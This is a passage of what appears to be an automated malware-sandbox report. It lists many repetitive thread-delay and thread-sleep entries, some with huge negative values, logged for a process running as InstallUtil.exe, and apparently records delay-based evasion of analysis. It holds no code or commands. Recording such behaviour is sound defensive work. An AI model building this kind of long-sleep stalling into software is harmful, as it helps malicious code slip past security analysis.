                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599888Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598662Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598429Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597607Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597493Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597391Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597165Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596824Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596719Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596391Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596266Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595700Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595476Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595241Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595113Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599842
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599731
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597334
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596932
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596755
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596617
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596391
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596060
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595701
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594812
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594683
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594568
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594325
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594093
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593983
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8340Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1512Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 3236Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 6600Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4487
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5352
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep count: 32 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1532Thread sleep count: 8340 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1532Thread sleep count: 1512 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -599218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -598652s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -598546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -598435s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -598326s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -598218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -598107s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -598000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -597890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -597781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -597672s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -597562s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -597453s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -597343s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -597234s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -597125s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -597015s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596906s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596797s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596687s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596578s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596468s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596359s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596250s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596031s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -595896s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -595771s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -595640s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -595358s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -595203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -595093s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594219s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep count: 36 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1900Thread sleep count: 3236 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -599888s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1900Thread sleep count: 6600 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -599781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -599672s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -599562s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -599453s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -599344s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -599219s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -598891s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -598662s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -598546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -598429s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -597750s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -597607s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -597493s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -597391s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -597281s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -597165s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -597062s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -596937s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -596824s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -596719s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -596609s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -596500s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -596391s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -596266s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -596141s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -596031s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -595922s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -595812s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -595700s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -595593s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -595476s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -595375s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -595241s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -595113s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -594999s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -594891s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -594766s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -594656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -594547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -594438s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -594313s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -594188s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -594078s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -593969s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -593844s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -593735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5404Thread sleep time: -593610s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep count: 39 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -35971150943733603s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5264Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5340Thread sleep count: 4487 > 30
